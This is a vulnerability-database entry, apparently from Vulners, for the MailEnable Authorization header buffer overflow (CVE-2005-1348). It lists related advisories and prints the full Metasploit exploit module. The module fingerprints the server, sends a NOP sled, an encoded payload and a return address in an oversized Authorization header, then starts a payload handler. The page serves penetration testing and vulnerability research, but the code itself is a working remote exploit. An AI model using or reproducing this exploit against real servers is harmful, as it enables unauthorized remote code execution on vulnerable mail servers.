Lucene search
+L

MailEnable Authorization Header Buffer Overflow

🗓️ 24 Apr 2005 00:00:00Reported by David Maciejak <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

MailEnable Authorization Header Buffer Overflow. Remote buffer overflow vulnerability in MailEnable web service. Triggered by large Authorization header. Affected: MailEnable Enterprise Edition < 1.0.5, MailEnable Professional < 1.55

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2005-1348
7 Jul 201000:00
circl
checkpoint_advisories
Check Point Advisories
MailEnable HTTP Authorization Header Buffer Overflow (CVE-2005-1348)
2 Aug 201100:00
checkpoint_advisories
cve
CVE
CVE-2005-1348
28 Apr 200504:00
cve
cvelist
Cvelist
CVE-2005-1348
28 Apr 200504:00
cvelist
exploitdb
Exploit DB
MailEnable - Authorisation Header Buffer Overflow (Metasploit)
7 Jul 201000:00
exploitdb
exploitdb
Exploit DB
MailEnable Enterprise & Professional - https Remote Buffer Overflow
25 Apr 200500:00
exploitdb
canvas
canvas
Immunity Canvas: MEWEBMAIL
2 May 200504:00
canvas
nvd
NVD
CVE-2005-1348
2 May 200504:00
nvd
packetstorm
Packet Storm
MailEnable Authorization Header Buffer Overflow
26 Nov 200900:00
packetstorm
ptsecurity
Positive Technologies
PT-2005-2350 · Mailenable · Mailenable Professional +1
28 Apr 200500:00
ptsecurity
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /MailEnable/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MailEnable Authorization Header Buffer Overflow',
        'Description' => %q{
          This module exploits a remote buffer overflow in the MailEnable web service.
          The vulnerability is triggered when a large value is placed into the Authorization
          header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and
          MailEnable Professional versions prior to 1.55 are affected.
        },
        'Author' => 'David Maciejak <david.maciejak[at]kyxar.fr>',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-1348'],
          ['OSVDB', '15913'],
          ['OSVDB', '15737'],
          ['BID', '13350'],
          ['URL', 'http://www.nessus.org/plugins/index.php?view=single&id=18123'],
        ],
        'Payload' => {
          'Space' => 512,
          'BadChars' => "\x0d\x0a"
        },
        'Platform' => 'win',
        'Targets' => [
          ['MEHTTPS.exe Universal', { 'Ret' => 0x006c36b7 }], # mehttps.exe
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2005-04-24',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    info = http_fingerprint # check method
    if (info =~ /MailEnable/)
      return Exploit::CheckCode::Detected('Target service detected')
    end

    Exploit::CheckCode::Safe('Target is not vulnerable')
  end

  def exploit
    buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')

    send_request_raw(
      {
        'headers' => { 'Authorization' => buffer }
      }, 2
    )

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation